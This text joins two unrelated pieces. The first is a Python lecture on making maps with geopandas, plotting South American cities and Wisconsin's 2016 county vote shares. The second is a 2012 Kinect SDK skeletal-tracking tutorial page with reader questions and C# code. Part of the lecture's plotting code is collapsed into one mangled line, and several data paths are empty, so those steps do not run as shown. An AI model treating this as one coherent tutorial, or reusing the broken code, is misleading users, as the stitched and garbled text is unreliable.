I just went through the tutorial; it's awesome!
I'm working on real-time motion retargeting onto a 3D model using the Kinect, and I'm unable to proceed after the skeleton data extraction. Please help me out regarding the further steps.
Thanks,
Regards
Hi Dan...,
Would it be possible with the toolbox to do a mob counter or a crowd counter?
To associate face images to a square?
It would not use the skeleton; rather, as you associate the image to the face, an algorithm would count the squares.
Can you help me implement this?
something like this video:
Thanks
Art
Hello Dan,
I am trying to control a drone with the Kinect. Do I use the skeleton and depth data for that?
I am running out of time, please help.
Hi Dan,
The sample code runs perfectly on my computer; however, when exiting the application, an exception happened on line 177 of KinectSkeletonViewer.xaml.cs where the line reads "ColorImagePoint colorPoint = depthFrame.MapToColorImagePoint(depthPoint.X, depthPoint.Y, this.Kinect.ColorStream.Format);".
The warning message is shown as "InvalidOperationException was unhandled
This API has returned an exception from an HRESULT: 0x80070015".
You may want to try the latest release of the Kinect SDK (1.5.2), as I think this should be fixed.
Hi Dan,
Awesome! Thanks for the video.
I've tried out the skeleton tracking (full body) and it works well in the standing/vertical position. However, when I try an exercise which requires lying down, with the skeleton in more of a horizontal position, the tracking does not work well. May I check with you whether there is any way to work around this problem, or whether a future release of the SDK will incorporate lying-down/horizontal skeleton tracking?
Please help.
Thanks,
Viet
@Dan: but I go here and the SDK is still 1.5, the toolkit is the one that have been updated. I'm getting the same "InvalidOperationException was unhandled This API has returned an exception from an HRESULT: 0x80070015" and don't really know what to do, cause it's related to the SkeletonViewer.
If I delete that viewer from MainWindow.xaml, that message doesn't appear (not even when closing the window), but that means I cannot render the skeletons on screen automatically.
Any ideas? Thanks.
Hello!
I have a question.
I've built the demo as shown above. But when I put ellipses for the joints on the canvas and run the project, the ellipses didn't appear in front of the color picture. Instead they are in the background, not visible. What did I do wrong?
Thank you for the answer.
@Dan: I am trying to use the design editor for the main window of the Visual Basic code sample, but I am getting an Invalid Markup error. No changes to the original code were made. Using KSDK 1.0.
Thanks!
@Perry and @juanpibanez
I have a solution to the "InvalidOperationException was unhandled This API has returned an exception from an HRESULT: 0x80070015" and I figured I would post for any future readers.
I installed version 1.6 of the SDK and the Toolkit (Kinect for Windows) to no avail. After that, I opened KinectSkeletonViewer.xaml.cs and noticed some functions were now obsolete. To make the fix, change the following:
Line 172 - 181
//******************
CoordinateMapper cm = new CoordinateMapper(this.Kinect);
DepthImagePoint depthPoint = cm.MapSkeletonPointToDepthPoint(skeletonPoint, depthFrame.Format);
switch (ImageType)
{
    case ImageType.Color:
        ColorImagePoint colorPoint = new ColorImagePoint();
        if (this.Kinect != null && this.Kinect.IsRunning)
            colorPoint = cm.MapDepthPointToColorPoint(depthFrame.Format, depthPoint, this.Kinect.ColorStream.Format);
        // map back to skeleton.Width & skeleton.Height
//******************
Once I updated these operations to the revised functions, I no longer receive the error. Hope this helps!
I used the QuickStart sample code for skeletal tracking and have the latest SDK, but I don't understand why the headImage does not follow my movements. The ellipses follow my hand motions. Why is it that when I run it, I can get the ellipses to work, but the headImage automatically goes to the top-left corner of the window and doesn't follow my head motions?
I was partially able to solve the problem. All 3 joints in the code are now tracking and the objects are moving, but I changed the headImage Image object to an Ellipse object in the .xaml window. The question now is why the headImage Image object did not work but the Ellipse object works.
I really like your videos; they have been very helpful to me. I want to save a movement (x, y, z) and then compare it with another movement (x, y, z) in real time. The idea is that the user will try to mimic the saved movement, and the system makes a calculation to find out how similar (0% ~ 100%) the motions are. My current problem is that the skeleton from the recorded movement is different from the skeleton that is trying to mimic the movement. I'm trying to work with the idea of a standardized skeleton; do you have any suggestions on how I can record and compare data in a standardized way?
Hi,
I tried to follow the video. Everything compiles, but the ellipses and the image are not mapped correctly in the window. I checked CameraPosition, and I do have the same calculation for "SetLeft" and "SetTop".
Also, I am unable to download the sample code.
Thanks for helping
The download link of the source files is dead:(
Can you fix this?
DL Link:
@SkiRacerDude Thank you:)
Hi Channel 9, this is really a beautiful series that you put up.
Hi, I was just wondering if you have your videos transcribed somewhere for download? I really appreciate the tips I'm learning, but English is not my native language, so sometimes the presenter speaks a bit too fast for me to follow. I would really appreciate a text version of these tutorials.
Keep up the good work. Thank you very much.
@Basvm: Welcome
Dear Sir,
I'm working on the Kinect and I have some questions:
1 - Hip center, hip_left and hip_right: what do they represent exactly in the body? The hip is not a point, it's a part consisting of 3 items in the body;
please tell me what exactly they represent in the body.
2 - For depth data, it gives only the distance between an object and the Kinect. If I have a 3D object like a cube, does it also return the points along the z-axis, or just the points facing the Kinect?
3 - If I need to track points that don't exist among the available joints, can I add other joints/points or not?
Warning 1 'Microsoft.Kinect.DepthImageFrame.MapFromSkeletonPoint(Microsoft.Kinect.SkeletonPoint)' is obsolete: 'This method is replaced by Microsoft.Kinect.CoordinateMapper.MapSkeletonPointToDepthPoint'
depth.MapFromSkeletonPoint(first.Joints[JointType.Head].Position);
This is the line that it says is obsolete.
Does anyone know how to fix this problem?
Hi,
I'm trying to run the sample code and came up with a problem:
the line "using Microsoft.Kinect;" has a red line under Kinect. The program runs, but a build error shows up first. Does anyone know how I can make this red line under Kinect disappear?
Hi,
how can I make a hover button activated by the hand skeleton, with the command loading an image for tracking the spine skeleton, in C#?
Thanks.
Thanks for great tutorial.
One thing: how do I set the image with a transparent background? I tried to do so, but the background is always white.
Hi Dan,
Really helpful tutorial. Helps me a lot.
But I am stuck on a very basic problem. How can I record RGB and depth video? I tried to save RGB and depth as .png files (as shown in the ColorBasics example, writing one .png color image) in each event handler method, but that only yields 6 fps. How can I record RGB and depth video at 30 fps? Do I need to use multi-threading? I don't know how to use it. Your help with this will be highly appreciated and very helpful for beginners.
Thanks again.
Also, the RGB and depth images are not synchronous when I try to write them this way. That is, for each RGB image there may not be a corresponding depth image.
@Adam Victor See my post above. I believe that is the fix you are looking for.
Hi Dan.
Thank you for all the tutorials; they are very useful. I'm doing a school project and I need to recognize some patterns like rectangles and circles, and then know at what depth they are. Do you have an example of this, or is there somewhere I can find something like this? Thank you again for your tutorials; keep up the good work.
@SFMID: If you are looking to analyze photos and do things like shape or object recognition, check out OpenCV.
I am developing a Kinect app which needs to be able to save the joint positions at set intervals. Depth won't matter though, so I only need to store the x and y, I think. My initial idea was to do this through image comparison, but I want to use the skeleton data. Any help much appreciated.
Please, could you update this sample for the latest SDK? It's really great and it's helping a lot with my graduation project, but now it's giving me many warnings with the new SDK. Could you please help?
Error 9: The name 'headImage' does not exist in the current context.
I am getting the same error for "leftEllipse" and "rightEllipse". Can anyone help me debug this issue?
Any help is appreciated.
Hi Dan,
I have a strange error with these constructor functions...
GetFirstSkeleton(e);
ScalePosition
GetCameraPoint(first, e);
All give the same error: "The name does not exist in the current context".
Hi Dan
The thing I did to the sample was to change the Microsoft.Kinect reference to the new version 1.7.0.0. Then I changed KinectSkeletonViewer.xaml.cs as Mason described before. But I still get some problems.
Firstly, when I close the MainWindow by clicking the X at the top-right corner, the image stops moving. However, the MainWindow is still there and can't be closed. Windows Task Manager shows that the MainWindow is not responding. Only after I stop debugging will the window close. So what's wrong, and what should I do?
Secondly, I get 6 warnings related to obsolete members on lines 128, 131, 134, 140, 144 and 148. For example:
'Microsoft.Kinect.DepthImageFrame.MapFromSkeletonPoint(Microsoft.Kinect.SkeletonPoint)' is obsolete: 'This method is replaced by Microsoft.Kinect.CoordinateMapper.MapSkeletonPointToDepthPoint'
I am new to C#, so I don't know how to change that. However, the program still runs well despite the warnings.
MACD is a popular technical indicator used in trading stocks, currencies, cryptocurrencies, etc.
MACD is used and discussed in many different trading circles. Moving Average Convergence Divergence (MACD) is a trend-following indicator. MACD can be calculated very simply by subtracting the 26-period EMA from the 12-period EMA. We previously discussed EMAs in our article here. MACD can be used and interpreted in a handful of different ways to give the trader potential value and insight into their trading decisions.
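That formula can be sketched in a few lines of pandas. The price series below is made up purely for illustration; the real examples later in this article pull actual AMD data:

```python
import pandas as pd

# Hypothetical closing prices -- any price series works the same way.
close = pd.Series([10.0, 10.5, 10.2, 10.8, 11.0, 10.7, 11.2, 11.5,
                   11.3, 11.8, 12.0, 11.6, 12.1, 12.4, 12.2, 12.6])

ema12 = close.ewm(span=12, adjust=False).mean()   # fast EMA
ema26 = close.ewm(span=26, adjust=False).mean()   # slow EMA
macd = ema12 - ema26                              # MACD line
signal = macd.ewm(span=9, adjust=False).mean()    # 9-period signal line

# In this made-up uptrend the fast EMA ends above the slow EMA,
# so the MACD line finishes positive.
print(macd.iloc[-1] > 0)
```

Passing adjust=False makes ewm() use the recursive definition of the EMA, which is what traders usually mean by a "26-period EMA".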
MACD is commonly used by analyzing crossovers, divergences, and periods of steep slope (positive or negative). Along with the MACD line (the 12-period EMA minus the 26-period EMA), the chart will commonly include a signal line plotted on top of the MACD. This signal line is a 9-day EMA of the MACD.
In a bullish crossover, just like with moving averages, a buy signal occurs when MACD crosses above the signal line. A bearish signal occurs when MACD crosses below the signal line. If a crossover occurs with a steeply sloping MACD, this can be a sign of an overbought or oversold condition, depending on whether the crossover is bullish or bearish, respectively. MACD is a great indicator for understanding if movement in the price is strong or weak. A weak movement is likely to correct, and a strong movement is likely to continue.
Divergences are also simple to understand. When the MACD makes a high or low that diverges from the corresponding high or low in the price, a divergence is established. A bullish divergence is in place when the MACD prints two rising lows while the asset price prints two falling lows. Divergences can be used to find a changing trend. Traders are always looking for a competitive edge, and predicting a trend change can be very profitable. Of course, divergences are not completely reliable and should only be used as an additional piece of information, not a sole indication of price direction.
A steep slope can signal an overbought or oversold situation. In such a situation a stock's trend is likely soon to lose steam and see a correction or reversal of the current direction. In the examples below we pull price data with the pyEX library, but you can use any other source of data you prefer.
import pandas as pd
import numpy as np
from datetime import datetime
import matplotlib.pyplot as plt
import pyEX as p

ticker = 'AMD'
timeframe = '6m'
df = p.chartDF(ticker, timeframe)
df = df[['close']]
df.reset_index(level=0, inplace=True)
df.columns = ['ds', 'y']
plt.plot(df.ds, df.y, label='AMD')
plt.show()
AMD from late 2018 to present date (early 2019).
exp1 = df.y.ewm(span=12, adjust=False).mean()
exp2 = df.y.ewm(span=26, adjust=False).mean()
macd = exp1 - exp2
exp3 = macd.ewm(span=9, adjust=False).mean()
plt.plot(df.ds, macd, label='AMD MACD', color='#EBD2BE')
plt.plot(df.ds, exp3, label='Signal Line', color='#E5A4CB')
plt.legend(loc='upper left')
plt.show()
This allows us to plot the MACD vs the signal line. See if you can spot the bullish and bearish crossovers!
MACD vs Signal Line
Check the graph below. Were you correct? Remember, a bullish crossover happens when the MACD crosses above the signal line and a bearish crossover happens when the MACD crosses below the signal line.
Bullish crossover represented in green, bearish crossover represented in red.
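Crossovers can also be flagged programmatically rather than by eye: check where the sign of (MACD - signal) flips. A minimal sketch on a made-up price series follows (swap in real closing prices; the first flagged bar is a warm-up artifact of seeding the EMAs with the first price):

```python
import pandas as pd

# Made-up closing prices for illustration only.
close = pd.Series([10, 11, 12, 13, 12, 11, 10, 9, 10, 11, 12, 13, 14, 13, 12],
                  dtype=float)

macd = (close.ewm(span=12, adjust=False).mean()
        - close.ewm(span=26, adjust=False).mean())
signal = macd.ewm(span=9, adjust=False).mean()

diff = macd - signal
# Bullish: MACD crosses from at-or-below the signal line to above it.
bullish = (diff > 0) & (diff.shift(1) <= 0)
# Bearish: MACD crosses from at-or-above the signal line to below it.
bearish = (diff < 0) & (diff.shift(1) >= 0)

print("bullish at", list(close.index[bullish]))
print("bearish at", list(close.index[bearish]))
```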
The above example was a simple way to use MACD to study crossovers. Next, let’s study strength and examine overbought or oversold conditions.
We start by implementing the exponential moving averages and MACD.
exp1 = df.y.ewm(span=12, adjust=False).mean()
exp2 = df.y.ewm(span=26, adjust=False).mean()
macd = exp1 - exp2
exp3 = macd.ewm(span=9, adjust=False).mean()  # signal line: the 9-period EMA of the MACD
plt.plot(df.ds, df.y, label='AMD')
plt.plot(df.ds, macd, label='AMD MACD', color='orange')
plt.plot(df.ds, exp3, label='Signal Line', color='Magenta')
plt.legend(loc='upper left')
plt.show()
Blue line represents the AMD stock price, orange line represents the MACD
We can blow this MACD line up a bit by plotting it separate from the stock price and see the steep slopes more clearly.
MACD from late 2018 to present date (early 2019).
Let's recall our discussion of overbought and oversold from earlier. We can see the MACD stays pretty flat over time, but there are certain times where the MACD curve is steeper than others. These are instances of overbought or oversold conditions. We represent our oversold conditions with green circles and overbought conditions with red circles. You can see that soon after the MACD shows an overbought or oversold condition, the momentum slows and the stock price reacts accordingly.
Green circles correspond to bullish divergence, red corresponds to bearish divergence
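The steepness those circles mark can be quantified too: the first difference of the MACD approximates its slope, and bars whose absolute slope clears a cutoff are candidates for exhaustion. A sketch on a made-up MACD series; the 1.5x-mean threshold is an arbitrary assumption, not a standard parameter:

```python
import pandas as pd

# Made-up MACD values: a sharp run-up followed by a sharp fade.
macd = pd.Series([0.0, 0.1, 0.3, 0.9, 1.6, 1.8, 1.7, 1.2, 0.5, 0.1])

slope = macd.diff()                   # per-bar change of the MACD line
threshold = 1.5 * slope.abs().mean()  # arbitrary cutoff for "steep"
steep = slope.abs() > threshold

print("steep bars:", list(macd.index[steep]))
```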
We briefly discussed MACD and implemented it in Python to examine its use in crossovers and overbought/oversold conditions. Hopefully this article helped you add another tool to your trading toolbox! | https://www.fmz.com/bbs-topic/3644 | CC-MAIN-2019-35 | refinedweb | 819 | 59.09 |
#include <LiquidCrystal.h>

/* LiquidCrystal display with:
   LCD 4 (RS) to arduino pin 12
   LCD 5 (R/W) to ground (non-existent pin 14 okay?)
   LCD 6 (E) to arduino pin 11
   d4, d5, d6, d7 on arduino pins 7, 8, 9, 10 */
LiquidCrystal lcd(12, 14, 11, 7, 8, 9, 10);

void setup()
{
  // position cursor on line x=4, y=3
  lcd.setCursor(3, 2);
  // Print a message to the LCD.
  lcd.print("hello, world!");
}

void loop() { }
LCD 5 (R/W) to ground (non-existent pin 14 okay?)
No begin nor init.
What I see looks like it's showing every pixel (a bunch of squares). Have I burned something?
If you don't use this function the default initialization is for a '1-line' display.
#include <LiquidCrystal.h>

LiquidCrystal lcd(12, 11, 5, 4, 3, 2);

void setup() {
  // here's the lcd.begin for my display (it's a 20x4)
  lcd.begin(20, 4);
  lcd.print("Hello Arduino!");
}

// let's print time passing by...
void loop() {
  lcd.setCursor(0, 1);
  lcd.print(millis() / 1000);
}
I don't think it's a matter of contrast, since I tried grounding the contrast pin, feeding it 3.3 V directly, and using the trimmer. Another question: do I have to put a resistor on the backlight LED, or is it already current-limited?
gave him directly 3.3V
Most HD44780-compatible LCDs require Vo to sit about 4 V below Vdd for the contrast to work.
You can check this by using a battery to create the negative voltage: connect the battery's positive terminal to ground and its negative terminal to the Vo pin. You will see very dark pixels displayed on the LCD.
void setup() {
  pinMode(9, OUTPUT);
  // set up the LCD's number of columns and rows:
  lcd.begin(20, 4);
  analogWrite(9, 145);  // let's try...
  // Print a message to the LCD.
  lcd.print("hello, world!");
}
analogWrite(9, 20);
I'm having a trouble with a 20x4 LCD.
Obviously, every connection is made correctly.
I've got a trimmer (10 kOhm), but I'm having the same issue with this code...
I tried all the stuff above; I even connected the contrast pin to a digital output (pin 9) to set the voltage, like this:
I think i burned something (like some driver, if there is any).
So, that is what I've done. Sorry if it's a little confusing, but this should clarify what I'm doing. Let me know what you think!
Quote from: altagest on Oct 09, 2012, 08:47 pmSo, that is what i've done. sorry if it's a little bit confused, but this should clarify what i'm doing.Let me know what you think!Open -> Liquid Crystal -> HelloWorld | http://forum.arduino.cc/index.php?topic=126214.msg949423 | CC-MAIN-2015-27 | refinedweb | 451 | 77.23 |
Do not use the same variable name in two scopes where one scope is contained in another. For example,
- No other variable should share the name of a global variable if the other variable is in a subscope of the global variable.
- A block should not declare a variable with the same name as a variable declared in any block that contains it.
Reusing variable names leads to programmer confusion about which variable is being modified. Additionally, if variable names are reused, generally one or both of the variable names are too generic.
Noncompliant Code Example
This noncompliant code example declares the msg identifier at file scope and reuses the same identifier to declare a character array local to the report_error() function. The programmer may unintentionally copy the function argument to the locally declared msg array within the report_error() function. Depending on the programmer's intention, it either fails to initialize the global variable msg or allows the local msg buffer to overflow by using the global value msgsize as a bounds for the local buffer.
#include <stdio.h>

static char msg[100];
static const size_t msgsize = sizeof(msg);

void report_error(const char *str) {
  char msg[80];
  snprintf(msg, msgsize, "Error: %s\n", str);
  /* ... */
}

int main(void) {
  /* ... */
  report_error("some error");
  return 0;
}
Compliant Solution
This compliant solution uses different, more descriptive variable names:
#include <stdio.h>

static char message[100];
static const size_t message_size = sizeof(message);

void report_error(const char *str) {
  char msg[80];
  snprintf(msg, sizeof(msg), "Error: %s\n", str);
  /* ... */
}

int main(void) {
  /* ... */
  report_error("some error");
  return 0;
}
When the block is small, the danger of reusing variable names is mitigated by the visibility of the immediate declaration. Even in this case, however, variable name reuse is not desirable. In general, the larger the declarative region of an identifier, the more descriptive and verbose should be the name of the identifier.
By using different variable names globally and locally, the compiler forces the developer to be more precise and descriptive with variable names.
Noncompliant Code Example
This noncompliant code example declares two variables with the same identifier, but in slightly different scopes. The scope of the identifier i declared in the for loop's initial clause terminates after the closing curly brace of the for loop. The scope of the identifier i declared in the for loop's compound statement terminates before the closing curly brace. Thus, the inner declaration of i hides the outer declaration of i, which can lead to unintentionally referencing the wrong object.
void f(void) {
  for (int i = 0; i < 10; i++) {
    long i;
    /* ... */
  }
}
Compliant Solution
This compliant solution uses a unique identifier for the variable declared within the for loop.
void f(void) {
  for (int i = 0; i < 10; i++) {
    long j;
    /* ... */
  }
}
Exceptions
DCL01-C-EX1: A function argument in a function declaration may clash with a variable in a containing scope provided that when the function is defined, the argument has a name that clashes with no variables in any containing scopes.
extern int name;
void f(char *name);  /* Declaration: no problem here */
/* ... */
void f(char *arg) {  /* Definition: no problem; arg doesn't hide name */
  /* Use arg */
}
DCL01-C-EX2: A temporary variable within a new scope inside of a macro can override a surrounding identifier.
#define SWAP(type, a, b) do { type tmp = a; a = b; b = tmp; } while (0)

void func(void) {
  int tmp = 100;
  int a = 10, b = 20;
  SWAP(int, a, b);  /* Hidden redeclaration of tmp is acceptable */
}
Risk Assessment
Reusing a variable name in a subscope can lead to unintentionally referencing an incorrect variable.
Automated Detection
Related Vulnerabilities
Search for vulnerabilities resulting from the violation of this rule on the CERT website.
5 Comments
Robert Seacord (Manager)
The first NCE and CS should differ only in the specific violation being addressed by this guideline.
Dhruv Mohindra
Why aren't there any parentheses around msg in these two lines:
The variable names in the CS have changed as compared to the NCE.
Also, the sentence "either failing to initialize the assign global variable,..." doesn't seem to need the word "assign".
David Svoboda
I rewrote the paragraph with the "assign" typo you cite. While saying sizeof msg is syntactically valid C, our styling conventions typically use parentheses after sizeof, which makes it look like a C function (although it is an operator, not a function).
Martin Sebor
There are four kinds of scopes: file scope, function scope, block scope, and function prototype scope, with the last three scopes always being "nested" in the file scope. I think it would be worthwhile to mention them in the introduction and explain the differences so that we can then formally refer to them in the examples.
David Svoboda
Agreed. I've no idea if this rule is meant to apply to names declared in both file scope and in a struct. (They could clash if the struct has methods, but that is not common in C.)
Warning: This was created with older versions of Ember.js and is likely no longer relevant. Please tread lightly when referencing this article.
Getting Facebook integrated into an existing website may sound daunting but using the Facebook UI API and Ember together was entirely too easy.
Ember-CLI has a directory called initializers that are loaded at app start up. This proves useful for things such as Google Analytics or Facebook SDK initialization.
Here is what my facebook-sdk.js initializer looks like. Note the use of global FB; this is used so that JSHint doesn't freak out when building the project.
/* global FB */
export default {
  name: 'facebook',
  initialize: function() {
    var fbAsyncInit = function() {
      FB.init({
        appId   : '<your app id>',
        xfbml   : true,
        version : 'v2.2'
      });
    };

    (function(d, s, id) {
      var js, fjs = d.getElementsByTagName(s)[0];
      if (d.getElementById(id)) { return; }
      js = d.createElement(s); js.id = id;
      js.src = "//connect.facebook.net/en_US/sdk.js";
      fjs.parentNode.insertBefore(js, fjs);
    }(document, 'script', 'facebook-jssdk'));

    window.fbAsyncInit = fbAsyncInit;
  }
};
Now I can use the global FB.ui in components with ease. So far I’ve only integrated the Facebook Send Dialogue into the application, but this alone can show how easy it is for the Facebook SDK to now integrate with your Ember Application.
/* global FB */
import Ember from 'ember';

export default Ember.Component.extend({
  classNames: ['facebook-send'],
  actions: {
    sendLink: function() {
      FB.ui({
        method: 'send',
        link: '',
      });
    }
  }
});
Check out what other pieces you could use in your Ember application by visiting the Facebook JS SDK Documentation
I need the URL sent in the FB Send dialog to be relative to the environment I am in, so I added a little mixin I can use throughout the site to generate proper links for each environment. Check it out!
import Ember from 'ember';

export default Ember.Mixin.create({
  currentBaseUrl: function() {
    var pathArray = window.location.href.split('/');
    return '%@//%@'.fmt(pathArray[0], pathArray[2]);
  }.property()
});
Update: I expand on this post in a talk I gave for a SanDiego.js and San Diego Ember talk in February 2015. Watch it here or view the slides here | https://hbrysiewicz.com/2014-12-16-ember-facebook-components.html | CC-MAIN-2021-43 | refinedweb | 310 | 59.3 |
The
SQL::OOP provides an object oriented interface for generating SQL statements. This is an alternative to SQL::Abstract but doesn't require any complex syntactical hash structure. All you have to do is to call well-readable OOP methods. Moreover, if yo...JAMADAM/SQL-OOP-0.21 - 29 May 2014 12:49:49-OOP-0.36 - 08 Mar 2014 18:58:19 GMT - Search in distribution
Net::Moo is an OOP wrapper for the Moo.com API. OPTIONS Options are passed to Net::Moo using a Config::Simple object or a valid Config::Simple config file. Options are grouped by "block". moo * api_key String. *required* A valid Moo API key. * valida...ASCOPE/Net-Moo-0.11 - 19 Jun 2008 14:58:50 (1 review) - 10 Aug 2008 22:09:28 GMT - Search in distribution
OOP for reading and writing XBEL files. PACKAGE METHODS __PACKAGE__->new() Returns an *XML::XBEL* object. OBJECT METHODS $self->parse_file($file) Returns true or false. $self->parse_string($string) Returns true or false. $obj->new_document(\%args) Va...ASCOPE/XML-XBEL-1.4 - 02 Apr 2005 21:03:54 GMT - Search in distribution
OOP-ish interface to the Internet Topic Exchange. NOTES * The error handling sucks and will be addressed in future releases. PACKAGE METHODS __PACKAGE__->new($blogname) Returns an object.Woot! OBJECT METHODS Net::ITE $ite->topics() When called in a s...ASCOPE/Net-ITE.pm-0.05 - 20 Mar 2003 14:16:06 GMT - Search in distribution
Geowhat? A Geotude is : "permanent and hierarchical. [As] a trade-off: A Geotude is less intuitive than address, but more intuitive than latitude/longitude. A Geotude is more precise than address, but less precise than latitude/longitude." This packa...ASCOPE/Geo-Geotude-1.0 - 09 Aug 2007 02:05:13 GMT - Search in distribution
simply OOP I/F by the name. name space not tainted default. if Perl5.8 or higher then use File::stat. AUTHOR Shin Honda<lt>makoto@cpan.jp<gt> SEE ALSO stat. ...MAKOTO/File-Stat-0.01 - 24 Feb 2003 12:24:40 GMT - Search in distribution
CGI::FCKeditor is FCKeditor() Controller for Perl OOP. FCKeditor() is necessary though it is natural. METHODS new my $fck = CGI::FCKeditor->new(); Constructs instance. set_name $fck->set_name('fck'); ...SHIRAIWA/CGI-FCKeditor-0.02 - 01 Apr 2007 02:49:33 GMT - Search in distribution sits on top of all the MIDI modules -- notably MIDI::Score (so you should skim MIDI::Score) -- and is meant to serve as a basic interface to them, for composition. By composition, I mean composing anew; you can use this module to add to o...CONKLIN/MIDI-Perl-0.83 - 01 Feb 2013 22:06:14 GMT - Search in distribution
Provides a simple OOP-ish interface to the Google SOAP API ENCODING According to the Google API docs : "In order to support searching documents in multiple languages and character encodings the Google Web APIs perform all requests and responses in th...ASCOPE/Net-Google-1.0 - 03 Dec 2005 19:16:38
Date::Holidays is an aggregator of adapters exposing a uniform API to a set of modules either in the Date::Holidays::* namespace of elsewhere. All of these modules deliver methods and information on national calendars. The module seem to more or less...JONASBN/Date-Holidays-0.15 - 13 Mar 2007 20:04:50 GMT - Search in distribution
This is a marker package so distributions that are based on Class::Scaffold can require it. INSTALLATION See perlmodinstall for information and options on installing Perl modules. BUGS AND LIMITATIONS No bugs have been reported. Please report any bug...MARCEL/Class-Scaffold-1.102280 - 16 Aug 2010 16:46:43 GMT - Search in distribution | https://metacpan.org/search?q=OOP | CC-MAIN-2014-23 | refinedweb | 609 | 59.6 |
Applet components not showing
Pat Peg
Ranch Hand
Joined: Feb 04, 2005
Posts: 195
posted
Feb 08, 2005 12:04:00
So, I build an
Applet
with text areas, button JcomboBoxes, etc. I put all these components in a
JPanel
called jPanel1. At the end I pop the panel on the container and everything worked great until I decided to have a selection from a
JComboBox
place one component, a
JTable
, on the panel.(Before I was just placing it directly on there without user input). It appears to remove the old component (a
JScrollPane
) but the table never shows. What do I need to do?
see code snippets below
// SelectPlan is the JComboBox
SelectPlan.addActionListener(new java.awt.event.ActionListener() {
    public void actionPerformed(java.awt.event.ActionEvent evt) {
        SelectPIDActionPerformed(evt);
    }
});
jPanel1.add(SelectPlan); // add comboBox to panel; panel will be added to container later
SelectPlan.setBounds(380, 10, 310, 19);
...
private void SelectPIDActionPerformed(java.awt.event.ActionEvent evt) {
    JComboBox jcb = (JComboBox) evt.getSource();
    String pid = (String) jcb.getSelectedItem();
    jPanel1.remove(jspPid);
    container.remove(jPanel1);
    pTable.setPreferredSize(new java.awt.Dimension(450, 150));
    pTable.setVisible(true);
    jPanel1.add(pTable);
    pTable.setBounds(30, 62, 430, 150);
    container.add(jPanel1);
    container.repaint();
}
Craig Wood
Ranch Hand
Joined: Jan 14, 2004
Posts: 1535
posted
Feb 08, 2005 19:44:00
import java.awt.*;
import java.awt.event.*;
import javax.swing.*;

public class ChangingComponents {
    JTable[] tables;
    JScrollPane scrollPane;

    public ChangingComponents() {
        createTables();
        scrollPane = new JScrollPane(tables[0]);
        JFrame f = new JFrame();
        f.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
        f.getContentPane().add(getButtonPanel(), "North");
        f.getContentPane().add(scrollPane);
        f.getContentPane().add(getComboPanel(), "South");
        f.setSize(400, 200);
        f.setLocation(200, 200);
        f.setVisible(true);
    }

    private void createTables() {
        String[] headers = { "column 1", "column 2", "column 3", "column 4" };
        String[] seeds = { "wolf", "cougar", "bison" };
        tables = new JTable[seeds.length];
        int rows = 4, cols = 4;
        for (int j = 0; j < seeds.length; j++) {
            Object[][] data = new Object[rows][cols];
            for (int row = 0; row < rows; row++)
                for (int col = 0; col < cols; col++)
                    data[row][col] = seeds[j] + " " + (row * cols + col + 1);
            tables[j] = new JTable(data, headers);
        }
    }

    private JPanel getButtonPanel() {
        JButton show = new JButton("show tables");
        show.addActionListener(new ActionListener() {
            public void actionPerformed(ActionEvent e) {
                printTableData();
            }
        });
        JPanel panel = new JPanel();
        panel.add(show);
        return panel;
    }

    private void printTableData() {
        for (int j = 0; j < tables.length; j++) {
            System.out.println("\t**** table " + (j + 1) + " ****");
            int rows = tables[j].getRowCount();
            int cols = tables[j].getColumnCount();
            for (int row = 0; row < rows; row++) {
                for (int col = 0; col < cols; col++) {
                    System.out.print(tables[j].getValueAt(row, col));
                    if (col < cols - 1)
                        System.out.print(", ");
                }
                System.out.println();
            }
        }
    }

    private JPanel getComboPanel() {
        String[] items = { "wolves", "cougars", "bison" };
        final JComboBox combo = new JComboBox(items);
        combo.addActionListener(new ActionListener() {
            int lastIndex = 0; // to remember who's showing

            public void actionPerformed(ActionEvent e) {
                int index = combo.getSelectedIndex();
                scrollPane.remove(tables[lastIndex]);
                scrollPane.getViewport().setView(tables[index]);
                lastIndex = index;
            }
        });
        JPanel panel = new JPanel();
        panel.add(combo);
        return panel;
    }

    public static void main(String[] args) {
        new ChangingComponents();
    }
}
Pat Peg
Ranch Hand
Joined: Feb 04, 2005
Posts: 195
posted
Feb 09, 2005 07:12:00
I do not wish to seem ungrateful, I appreciate someone taking the time to answer.
Thank you Craig but�
I do not think the answer provided can be used in this case. The reason is that the tables (2 of them) have 10 columns and ,in worse case, 6000 rows (on average just around 1000) This would mean possibly storing 120,000 JTables. Even if the clients machine could handle this I don�t think it would be the best approach. I should have given more details when I first posted. My apologies.
I am implementing the code found on Sun�s web-site:
It seems to work great after modifying it to take the data from a database based on user selection in the applet. I just can�t seem to get it to appear in the beginning. If I build all my components from the start and populate the table with a hard coded selection so that when the entire container is started it knows to place a table at a certain location then everything works great. I can sort and re-sort.
If I draw everything from the beginning except the table and wait on the user to put in the parameters for the table then�.not so good
It seems to remove the component that I put in as a place holder for the table (a JscrollPane) but the table never appears.
Again, Thank you Craig for your input but if you, are someone else, could re-examine the issue with this new information I would appreciate it.
Pat Peg
Ranch Hand
Joined: Feb 04, 2005
Posts: 195
posted
Feb 09, 2005 07:27:00
Update...disregard and thanks for the help. In backtracking to get back to the original code I fixed it so it does what I need it to now.
Ernest Friedman-Hill
author and iconoclast
Marshal
Joined: Jul 08, 2003
Posts: 24189
posted
Feb 09, 2005 07:28:00
If you add a component to a container after that container is physically visible on the screen, then you must call validate() on that container to force it to be laid out again, or the new component won't show up. Perhaps that's the problem you're having?
[Jess in Action]
[AskingGoodQuestions]
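Ernest's advice can be sketched in a few lines; the class and method names below are invented for illustration and are not from the original applet code.

```java
import java.awt.BorderLayout;
import java.awt.Container;
import javax.swing.JPanel;
import javax.swing.JScrollPane;
import javax.swing.JTable;

// Hypothetical sketch: a table is added only after the container is already
// laid out on screen, so the container must be validated afterwards.
public class AddAfterVisible {

    static void addTableLater(Container content, Object[][] rows, Object[] cols) {
        JTable table = new JTable(rows, cols);
        content.add(new JScrollPane(table), BorderLayout.CENTER);
        content.validate();  // force the container to lay itself out again
        content.repaint();   // then repaint so the new component is drawn
    }

    public static void main(String[] args) {
        Container content = new JPanel(new BorderLayout());
        addTableLater(content, new Object[][] {{"a", "b"}}, new Object[] {"Col1", "Col2"});
        System.out.println("components: " + content.getComponentCount()); // components: 1
    }
}
```

Calling repaint() alone, as in the original attempt, only schedules a redraw and never recomputes the layout, which is why the table stays invisible.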
Pat Peg
Ranch Hand
Joined: Feb 04, 2005
Posts: 195
posted
Feb 09, 2005 08:47:00
Ernest,
